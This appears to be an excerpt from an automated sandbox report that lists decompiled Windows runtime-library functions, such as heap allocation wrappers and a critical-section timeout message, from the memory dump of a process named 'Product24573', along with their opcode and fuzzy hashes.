                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                          • Instruction ID: 40e9796beb1bb7bdb1331d3c9901f520e7dd0c71afb1d99b13740b1e47dab9ae
                                          • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                          • Instruction Fuzzy Hash: E5C08C33180248BBCB126F81CC00F46BF2AFBA4B60F008020FA080B570C632E970EB84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01113A1C Relevance: .0, Instructions: 10COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E01113A1C(intOrPtr _a4) {
				void* _t5;

				return L01114620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                          0x01113a35

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                          • Instruction ID: ad8a7be901a3c4dee93c25d051a48198e16fa996015e257d81ce0502cc295778
                                          • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                          • Instruction Fuzzy Hash: 6BC08C32080248BBC7126E41DC00F01BB2AE7A0B60F000020B6040A9608632EC60D588
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010FAD30 Relevance: .0, Instructions: 10COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E010FAD30(intOrPtr _a4) {

				return L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                          0x010fad49

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                          • Instruction ID: 88b4d1b2c3a562405818950470b2200e4ec3c8ee1e9d3ef8dc02ea96af8dad07
                                          • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                          • Instruction Fuzzy Hash: 77C08C32080648BBC7126A45CD00F01BB29E7A0B60F000020F6040A6A18A32E860D588
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011236CC Relevance: .0, Instructions: 10COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E011236CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L01114620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                          0x011236d2
                                          0x011236e8
                                          0x011236d4
                                          0x011236e5
                                          0x011236e5

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                          • Instruction ID: b9edfe9ef6fce5c5d275464cae8e2676f85a94d7d6f919bb4634f795710aa543
                                          • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                          • Instruction Fuzzy Hash: 18C02BB0160440FBD72D1F30CD00F14B258F700F25F640764B230458F0D72C9C00D100
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011076E2 Relevance: .0, Instructions: 10COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E011076E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                          0x011076e4
                                          0x00000000
                                          0x011076f8
                                          0x011076fd

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                          • Instruction ID: 54355c1b208c9c89d41f67ec6a9f86c990c8adb073443145e15e07aa756e3510
                                          • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                          • Instruction Fuzzy Hash: C7C08C706415805AFB2F570CCE24B203A50AB08608F8801ACEA82095E2C3A8B802C208
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01117D50 Relevance: .0, Instructions: 7COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E01117D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                          0x01117d56
                                          0x01117d5b
                                          0x01117d60
                                          0x01117d5d
                                          0x01117d5d
                                          0x01117d5d

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                          • Instruction ID: 190c163edf604cd6760d595efd13d726906333b3fb6e2fa8a76a3816135b98a4
                                          • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                          • Instruction Fuzzy Hash: D9B092353019408FCE1ADF18C080B1973F4BB48A40B8440E0E400CBA21D329E8008900
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01122ACB Relevance: .0, Instructions: 5COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E01122ACB() {
				void* _t5;

				return E0110EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                          0x01122adc

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                          • Instruction ID: 0105582c57b29f6d9fbf306e65a93de77fc0cc422a5d26cbc826d93f9c231f6c
                                          • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                          • Instruction Fuzzy Hash: F3B01232C51841CFCF07FF40C610B197331FB00750F094890900127970C328AC01CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01139950 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d77f2efe2105e633b3e2fa07a81a9366ae8ba7b5f7903d592eb24d6202fb0f62
                                          • Instruction ID: a62d6f53d8510c3093059ce312e62b63b70e4a69e4fadca3ef7ae77c51100f4f
                                          • Opcode Fuzzy Hash: d77f2efe2105e633b3e2fa07a81a9366ae8ba7b5f7903d592eb24d6202fb0f62
                                          • Instruction Fuzzy Hash: 139002B130140403D944659959046070005A7E0752F51C015A2055595ECB698C517179
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011399D0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9e0e097f57526717d1fb4e7f68c4ebfa34a02589a3897300048a6f15726e2293
                                          • Instruction ID: 7443b6599497c06cd699fe7b437726608eeaeef50cbffaee939ac86856e62b4f
                                          • Opcode Fuzzy Hash: 9e0e097f57526717d1fb4e7f68c4ebfa34a02589a3897300048a6f15726e2293
                                          • Instruction Fuzzy Hash: A99002B131100043D908619955047060045A7F1651F51C016A2145594CC6698C616169
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01139820 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c77d506ac89536f18b6f0110335768204693ad6a79cacbb5f3af858959505dfc
                                          • Instruction ID: d9294228d6f4782799c96b0d6ec3308b286f98e4a7c6b4a59d56b0bd5e48094d
                                          • Opcode Fuzzy Hash: c77d506ac89536f18b6f0110335768204693ad6a79cacbb5f3af858959505dfc
                                          • Instruction Fuzzy Hash: EC90027134100403D945719955046060009B7E0691F91C016A0415594EC7958A56BAA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0113B040 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: edc533a2ab36dcf69dc94927aa455c359ff366f6fdee1a6bf67970a23f759d1e
                                          • Instruction ID: 7feb70be1bad611ec6b2089dc99840b4187177127805f3a07fff8801ededc47c
                                          • Opcode Fuzzy Hash: edc533a2ab36dcf69dc94927aa455c359ff366f6fdee1a6bf67970a23f759d1e
                                          • Instruction Fuzzy Hash: AA9002B1701140434D44B19959044065015B7F1751391C125A04455A0CC7A88855A2A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011398A0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bb7a6fc8aa74d336072334bbba62f2dd4a97f6ad06756c328861647726e676a2
                                          • Instruction ID: 16b2d1471c2b9b65c00e80cf1274192c990b23da4d383530d43822449c77d5fe
                                          • Opcode Fuzzy Hash: bb7a6fc8aa74d336072334bbba62f2dd4a97f6ad06756c328861647726e676a2
                                          • Instruction Fuzzy Hash: 4890027130100403D906619955146060009E7E1795F91C016E1415595DC7658953B176
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01139B00 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6ef7af04bfce6a1f2353446b835571dfe158d470998b723d00ff86cf9044c2b8
                                          • Instruction ID: 3e0c696e8a4621312c70f39e9aedadba90dca6839b0718d47f589b49c24fbcd1
                                          • Opcode Fuzzy Hash: 6ef7af04bfce6a1f2353446b835571dfe158d470998b723d00ff86cf9044c2b8
                                          • Instruction Fuzzy Hash: A490027134100803D944719995147070006E7E0A51F51C015A0015594DC756896576F5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0113A3B0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2cec68100fe8a2c8e18ceee8874c190a85cf9c3f636268d34ea6aaa932fade51
                                          • Instruction ID: b748a298e8cb6280e9fb7e333aedf64ea353aa1cd5143e157cfd2e4e6bc0798b
                                          • Opcode Fuzzy Hash: 2cec68100fe8a2c8e18ceee8874c190a85cf9c3f636268d34ea6aaa932fade51
                                          • Instruction Fuzzy Hash: E590027130144003D9447199954460B5005B7F0751F51C415E0416594CC7558856A265
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01139A10 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f1ac005aa7d3fa41d740b330c4faabf4f20946fb2cf8bb3fe4fca8500edb3a15
                                          • Instruction ID: b53d0e7946685ef1a8b169e9502bf66a41ae5dbf871b9102c4d36c6f53414363
                                          • Opcode Fuzzy Hash: f1ac005aa7d3fa41d740b330c4faabf4f20946fb2cf8bb3fe4fca8500edb3a15
                                          • Instruction Fuzzy Hash: 5B90027130140403D904619959087470005A7E0752F51C015A5155595EC7A5C8917575
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01139A80 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 534213aadf52ed42be543586b789321f739d4fe52e3101e037024124bacedff3
                                          • Instruction ID: 3fae74d705a2c2ee80c996cd8a4462441823f85215c8c2adb90267480a5a79b8
                                          • Opcode Fuzzy Hash: 534213aadf52ed42be543586b789321f739d4fe52e3101e037024124bacedff3
                                          • Instruction Fuzzy Hash: 8390027130144443D94462995904B0F4105A7F1652F91C01DA4147594CCA5588556765
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0113AD30 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f0b099d789ad971cd085cb863b173555b5de875856c579df16b7b641cd99c499
                                          • Instruction ID: c544de28e729681870494340a2620cdd559a2c37dbff1eb17953ca99ebc2388f
                                          • Opcode Fuzzy Hash: f0b099d789ad971cd085cb863b173555b5de875856c579df16b7b641cd99c499
                                          • Instruction Fuzzy Hash: A9900271B05000139944719959146464006B7F0B91B55C015A0505594CCA948A5563E5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01139520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3e50a4e6a1371f6efcd68e14562f63489783957b249a94eaaef691b78389e945
                                          • Instruction ID: b31dd4e9aba1dcef8796bfa8ede6e23882143678d8f303e9feb5c6b9d3cce181
                                          • Opcode Fuzzy Hash: 3e50a4e6a1371f6efcd68e14562f63489783957b249a94eaaef691b78389e945
                                          • Instruction Fuzzy Hash: C79002F1301140934D04A2999504B0A4505A7F0651B51C01AE10455A0CC6658851A179
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01139560 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 635296f1965933536f61d973a0a6d3d15ada04fa4a1d1245bf11bf6fd0720709
                                          • Instruction ID: 5f0a0d918d776d2103143339fae4198131623e233ede6e55b80a51a99068a614
                                          • Opcode Fuzzy Hash: 635296f1965933536f61d973a0a6d3d15ada04fa4a1d1245bf11bf6fd0720709
                                          • Instruction Fuzzy Hash: 81900275321000030949A599170450B0445B7E67A1391C019F14075D0CC76188656365
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011395F0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f5383db5c5d80a3631ea5021569f9226aa38026ab47c1675ca3f56f091bf5e7a
                                          • Instruction ID: 4e3fe5311a9b9bae42a6898513e139ef042533b2cb3733ec719ad42b801a344e
                                          • Opcode Fuzzy Hash: f5383db5c5d80a3631ea5021569f9226aa38026ab47c1675ca3f56f091bf5e7a
                                          • Instruction Fuzzy Hash: 9B90027130100803D908619959046860005A7E0751F51C015A6015695ED7A588917175
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0113A710 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b71a3086727c31d79e3a635b90198a924031514e7e1f76cbc42206908010fb7e
                                          • Instruction ID: f8f5711af4c348467552a2662f9184818521a46e2b6f436533e1947305db6143
                                          • Opcode Fuzzy Hash: b71a3086727c31d79e3a635b90198a924031514e7e1f76cbc42206908010fb7e
                                          • Instruction Fuzzy Hash: A7900271301000539D04A6D96904A4A4105A7F0751B51D019A4005594CC69488616165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01139730 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8cd32fec5df5378878bfc44d803cca5d9c4298fc8313c8ea1577bd7d05982c68
                                          • Instruction ID: c14e8ed48bc8a6fe7a9899ef658dba7b5e9d9b972b498f54d56aeb7f432ed91d
                                          • Opcode Fuzzy Hash: 8cd32fec5df5378878bfc44d803cca5d9c4298fc8313c8ea1577bd7d05982c68
                                          • Instruction Fuzzy Hash: 1690027170500403D944719965187060015A7E0651F51D015A0015594DC7998A5576E5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01139770 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5a8b4d3c31aadfa987a3a71ebd0984fe72074a1959358a9f517abbffd0f80cd9
                                          • Instruction ID: 7bc1dacb0c231e5aaa39841c596ccc08b0d2cb4abe733bd5568bb6a077c9ed83
                                          • Opcode Fuzzy Hash: 5a8b4d3c31aadfa987a3a71ebd0984fe72074a1959358a9f517abbffd0f80cd9
                                          • Instruction Fuzzy Hash: 6390027130504443D90465996508A060005A7E0655F51D015A10555D5DC7758851B175
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0113A770 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a4c2842a51add8b31cf7064c8f10fd859ece3fdf218b8295c17ab9543b991632
                                          • Instruction ID: 943642203c455ef3a4f7b265aeebe6e8074f116a80d489f5dde38113e952d0de
                                          • Opcode Fuzzy Hash: a4c2842a51add8b31cf7064c8f10fd859ece3fdf218b8295c17ab9543b991632
                                          • Instruction Fuzzy Hash: 0A90027530504443DD0465996904A870005A7E0755F51D415A04155DCDC7948861B165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01139760 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e3b6affbae3e0810f74394ee1206e49c7862ddd0e3aaae0efe71f2b5c2b293fa
                                          • Instruction ID: 6237754dea581b9b9737de034837eb3bb913072752c1ae3b9e3638089041c556
                                          • Opcode Fuzzy Hash: e3b6affbae3e0810f74394ee1206e49c7862ddd0e3aaae0efe71f2b5c2b293fa
                                          • Instruction Fuzzy Hash: 7790027130100403D904619966087070005A7E0651F51D415A0415598DD79688517165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01139610 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 595f30a9955bdfba24df344d6d2eea40d35b15d3902f841e3eca6248f58591e1
                                          • Instruction ID: 8f1bcad4f24126977a583c395a5a52a1985a32e8a65dbb821d8ef39f8eb13325
                                          • Opcode Fuzzy Hash: 595f30a9955bdfba24df344d6d2eea40d35b15d3902f841e3eca6248f58591e1
                                          • Instruction Fuzzy Hash: 0990027170500803D954719955147460005A7E0751F51C015A0015694DC7958A5576E5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01139650 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 912c634f92d44e7cb30ed3fa8e57e9f193cdcca607b72357e2fd6e9ee8e5fd4e
                                          • Instruction ID: d26a7465d3c6a4d89a3f85d30020687a8e906d7c0ab0e967b42e9663cd28b9cc
                                          • Opcode Fuzzy Hash: 912c634f92d44e7cb30ed3fa8e57e9f193cdcca607b72357e2fd6e9ee8e5fd4e
                                          • Instruction Fuzzy Hash: D790027130504843D94471995504A460015A7E0755F51C015A00556D4DD7658D55B6A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011396D0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bbcf10c7564e6668df13e90ee59e630ca03a2edb2d4b79219bfc632dccec7f51
                                          • Instruction ID: f81c8848084df617ace8a602076cb5a81df46b86c675494b37413695dc16f5db
                                          • Opcode Fuzzy Hash: bbcf10c7564e6668df13e90ee59e630ca03a2edb2d4b79219bfc632dccec7f51
                                          • Instruction Fuzzy Hash: A190027130100843D90461995504B460005A7F0751F51C01AA0115694DC755C8517565
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01139670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction ID: 2752a280479a82980bc5a40999ce862cadb03e9ad9b16afd29b25434351c276a
                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0118FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 53%
                                          			E0118FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0113CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01185720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01185720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                          0x0118fdda
                                          0x0118fde2
                                          0x0118fde5
                                          0x0118fdec
                                          0x0118fdfa
                                          0x0118fdff
                                          0x0118fe0a
                                          0x0118fe0f
                                          0x0118fe17
